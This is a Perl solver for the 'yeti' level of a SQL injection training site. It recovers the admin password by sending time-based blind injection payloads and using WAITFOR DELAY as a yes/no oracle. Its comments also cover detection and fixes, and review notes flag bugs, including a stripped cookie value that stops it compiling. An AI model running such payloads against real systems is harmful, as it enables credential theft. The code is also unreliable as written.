#!/usr/bin/perl
# Time-based blind SQL injection solver for one Lord of SQL Injection
# ("yeti") training level. It recovers the admin password one character at a
# time, using the server's response latency as a yes/no oracle.
#
# Defender's view: each probe either stalls for ~7 s (WAITFOR DELAY '0:0:7')
# or returns immediately, so the activity is visible as a burst of requests to
# one URL with bimodal response times and a repeated, growing LIKE pattern in
# the query string. Parameterized queries remove the injection entirely;
# rate limiting and response-time anomaly alerts make the oracle unreliable.
use strict;
use warnings;
use LWP::UserAgent;
# LWP verifies the server certificate against this CA bundle. The path is
# hard-coded for the author's host and must exist, or every HTTPS request
# fails before reaching the server.
$ENV{PERL_LWP_SSL_CA_FILE} = '/etc/ssl/cert.pem';
$|++; # autoflush STDOUT so per-character progress is printed immediately
# Candidate characters tried at each position, given as code points. Only
# digits and lowercase letters are enabled; the commented-out ranges widen
# the search space at the cost of more requests per position.
my @charset = (
#33 .. 47, # !"#$%&'()*+,-./
48 .. 57, # 0-9
#58 .. 64, # :;<=>?@
#65 .. 70, # A-F
#97 .. 102, # a-f
#65 .. 90, # A-Z
#91 .. 96, # [\]^_`
97 .. 122, # a-z
#123 .. 126, # {|}~
);
my $url =
"https://los.rubiya.kr/chall/yeti_e6afc70b892148ced2d1e063c1230255.php"
;
# NOTE(review): the session cookie value was stripped from the published
# copy, leaving an empty assignment (`my $cookie = ;`). That is a syntax
# error, so the file does not compile as shown.
my $cookie =
;
# Client-side timeout of 5 s, deliberately shorter than the 7 s server-side
# delay: a "condition true" probe surfaces locally as a read timeout.
my $ua = LWP::UserAgent->new( timeout => 5 );
my $found = ''; # password prefix recovered so far
my $index = 0; # 1-based position of the character currently being guessed
while (1) { # unknown pwd length
$index++;
for my $ord (@charset) {
my $char = chr $ord;
print $char; # progress: the candidate currently under test
# Injected condition: if the stored pw starts with the known prefix plus
# this candidate, the server sleeps 7 s (T-SQL WAITFOR DELAY); otherwise it
# returns at once. '%25' is the URL-encoded '%' LIKE wildcard.
my $payload =
"?id=admin&pw=' if ((select pw from prob_yeti where id='admin') " .
"like '${found}${char}%25') WAITFOR DELAY '0:0:7' " .
"else WAITFOR DELAY '0:0:0'--"
;
# CONN labels a plain statement, not a loop, so the `redo CONN` below has
# no loop to resolve to and is expected to die with "Label not found".
CONN:
my $resp = $ua->get( $url.$payload, 'Cookie' => $cookie );
if ($resp->is_error) {
printf "\n[%d] %s\n", $resp->code, $resp->message;
# A 500 whose message is exactly 'read timeout' is the only response the
# script treats as "prefix matched"; any other error goes to the retry
# branch.
if ($resp->code == 500 && $resp->message eq 'read timeout') {
$found .= $char;
print "\n$index => $char, Total: '$found'\n";
last;
} else {
redo CONN; # intent appears to be "retry the same request" on other errors
}
} else {
# Fast response: candidate rejected. The guard compares the password
# position ($index) with the last index of @charset and appends a marker
# character (code point 219) when they are equal — NOTE(review): confirm
# that this is the intended end-of-search condition.
$found .= chr 219 if $index == $#charset; # last char and not found
}
}
}
# vim:sw=2:ts=2:sts=2:et:cc=80
# End of file